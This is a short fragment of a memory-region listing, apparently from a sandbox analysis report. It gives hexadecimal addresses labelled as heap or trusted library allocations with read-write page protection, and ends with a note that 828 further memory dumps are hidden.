heap
|
page read and write
|
||
17FB94C0000
|
heap
|
page read and write
|
||
17FB73AD000
|
heap
|
page read and write
|
||
21D7DA18000
|
trusted library allocation
|
page read and write
|
||
17FB94FB000
|
heap
|
page read and write
|
||
17FB93ED000
|
heap
|
page read and write
|
||
17FB9540000
|
heap
|
page read and write
|
||
1CC99949000
|
heap
|
page read and write
|
||
17FB9529000
|
heap
|
page read and write
|
||
1CC99C40000
|
heap
|
page read and write
|
||
21D66C87000
|
trusted library allocation
|
page read and write
|
||
17FB9583000
|
heap
|
page read and write
|
||
21D64FFE000
|
trusted library allocation
|
page read and write
|
||
1CC99939000
|
heap
|
page read and write
|
||
17FB916D000
|
heap
|
page read and write
|
||
17FB9161000
|
heap
|
page read and write
|
||
1CC99DB3000
|
heap
|
page read and write
|
||
1CC999A5000
|
heap
|
page read and write
|
||
17FB90B4000
|
heap
|
page read and write
|
||
1CC99979000
|
heap
|
page read and write
|
There are 828 hidden memdumps, click here to show them.